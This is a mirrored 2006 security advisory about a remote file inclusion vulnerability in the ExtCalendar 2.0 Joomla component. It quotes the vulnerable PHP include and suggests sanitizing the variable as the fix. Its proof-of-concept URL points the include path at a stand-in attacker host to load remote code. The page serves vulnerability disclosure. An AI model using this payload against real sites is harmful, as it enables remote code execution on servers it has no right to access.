French Security Incident Response Team

FrSIRT   

      

   français French  anglais English

 
Vulnerability Notification Service
 FrSIRT Partner Program
 14-Day Free Trial
Contact FrSIRT Sales Dept.
 

Security Advisories
Linux Security Advisories
Virus and Threats Advisories
Latest Security News
Latest Zero Day Threats
Advisories and vulnerabilities by Vendor
Advisories and vulnerabilities by Keyword
 

Report a security incident
Report a new vulnerability
Security Mailinglist
 

Our Company
FrSIRT in the News
Advertise on FrSIRT.COM
Security Researchers and Exploit Writers Jobs
Contact Us

 

FrSIRT / Public Mailing Lists Mirror

Assigned : FrSIRT/ADV-2006-2711

From : matdhule at gmail.com
Subject : [ECHO_ADV_36$2006] ExtCalendar <== v2.0 Remote File Include Vulnerabilities
Date : 2006-07-07

Original Message

ECHO.OR.ID
ECHO_ADV_36$2006

---------------------------------------------------------------------------
[ECHO_ADV_36$2006] ExtCalendar <== v2.0 Remote File Include Vulnerabilities
---------------------------------------------------------------------------

Author : Ahmad Maulana a.k.a Matdhule
Date : July 07th 2006
Location : Indonesia, Jakarta
Web : http://advisories.echo.or.id/adv/adv36-matdhule-2006.txt
Critical Lvl : Highly critical
Impact : System access
Where : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ExtCalendar

Application : ExtCalendar
version : 2.0
URL : http://extcal.sourceforge.net/
Description :

ExtCalendar is a powerful multi-user web-based calendar application.
Features include Multi-Languages, Themes, Recurrent Events, Categories,
Users and Groups management, Environment and General Settings, Template Configuration, Product Updates.

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~~

in folder com_extcalendar we found vulnerability script extcalendar.php.

-----------------------extcalendar.php----------------------
....
<?php
global $mosConfig_absolute_path;
require_once( $mosConfig_absolute_path."/components/com_extcalendar/config.inc.php" );
require_once( $CONFIG_EXT['LIB_DIR']."mail.inc.php" );
?>
...
----------------------------------------------------------

Variables $mosConfig_absolute_path are not properly sanitized. When register_globals=on
and allow_fopenurl=on an attacker can exploit this vulnerability with a
simple php injection script.

Proof Of Concept:
~~~~~~~~~~~~~~~~

http://[target]/[path]/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://attacker.com/evil.txt?

Solution:
~~~~~~~~

sanitize variabel $mosConfig_absolute_path in extcalendar.php


---------------------------------------------------------------------------
Shoutz:
~~~~~~
~ solpot a.k.a chris, J4mbi H4ck3r for the hacking lesson :)
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous
~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama
~ newbie_hacker@yahoogroups.com, jasakom_perjuangan@yahoogroups.com
~ #mardongan #jambihackerlink #e-c-h-o @irc.dal.net
---------------------------------------------------------------------------
Contact:
~~~~~~~

matdhule[at]gmail[dot]com

-------------------------------- [ EOF ] ----------------------------------

Disclaimer : FrSIRT does not endorse the content of this message submitted by others to public mailinglists. Messages submitted to public mailinglists do not necessarily reflect the opinions or policies of FrSIRT. FrSIRT makes no warranties, express or implied, as to the content of the message in this page or the accuracy and reliability of any messages and other materials submitted to public mailinglists. Any questions or comments regarding this page should be sent to public-messages@frsirt.com

 

Copyright 2003-2008 © FrSIRT.COM - Privacy Policy